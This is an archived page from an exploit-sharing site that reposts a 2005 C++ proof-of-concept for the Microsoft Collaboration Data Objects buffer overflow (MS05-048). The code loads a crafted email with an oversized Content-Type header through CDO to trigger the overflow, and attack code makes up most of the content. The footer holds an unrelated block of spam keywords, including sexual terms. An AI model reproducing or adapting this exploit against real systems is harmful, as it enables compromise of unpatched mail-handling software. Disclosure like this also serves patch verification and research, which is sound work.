about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)



2005-10-13 Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
Rated as : High Risk 

//
// Microsoft CDO Proof of Concept Exploit by Gary O'leary-Steele <garyo
at sec-1.com>
// 
// Step 1. 
// 
// Create an E-mail named vuln.eml including a large
"Content-Type:" header. 
// 
// Step 2. 
//
// Compile with -GX option 
//

#import <msado15.dll> no_namespace rename("EOF",
"adoEOF") 
#import <cdosys.dll> rename_namespace("CDO") 

#include <stdio.h> 

int main() 
{ 

CoInitialize(0); 
try 
{ 
CDO::IMessagePtr spMsg(__uuidof(CDO::Message)); 
_StreamPtr spStream(spMsg->GetStream()); 
spStream->Position = 0; 
spStream->Type = adTypeBinary; 
spStream->LoadFromFile("vuln.eml"); 
spStream->Flush(); 

for(long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++) 
{ 
CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; 
_variant_t v = 
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;

} 

} 
catch(_com_error &e) 
{ 
printf("COM error[0x%X, %s]\n", e.Error(), 
(LPCTSTR)e.Description()); 
} 
catch(...) 
{ 
printf("General exception\n"); 
} 

CoUninitialize(); 

return 0; 
} 

CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i]; 
_variant_t v = 
spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;

securitydot.net - 2005-10-13

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 10:19:00 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo guest+book faingc shelpasety Idol votin free sex v fake nude b o o b s free sex v www.ljyoyo ANI www.fzlmei Kernel ccb news for c sexgir boy mamta +www98.com bbs.xinshi apache 0.6 les bronz? Sivaji pho bbs.mk169. www.mk169. news for c Www trisha SOAP www.action ladies wit Pornobilde you tob vCard xxxlongcli FINAL CMS is Fre www.shakir 200 /compo 741 orkut.com six video news for c acc office sca com_galler hinh+anh+s Www.Desipa php-nuke 2 system/inc ems galler Johncena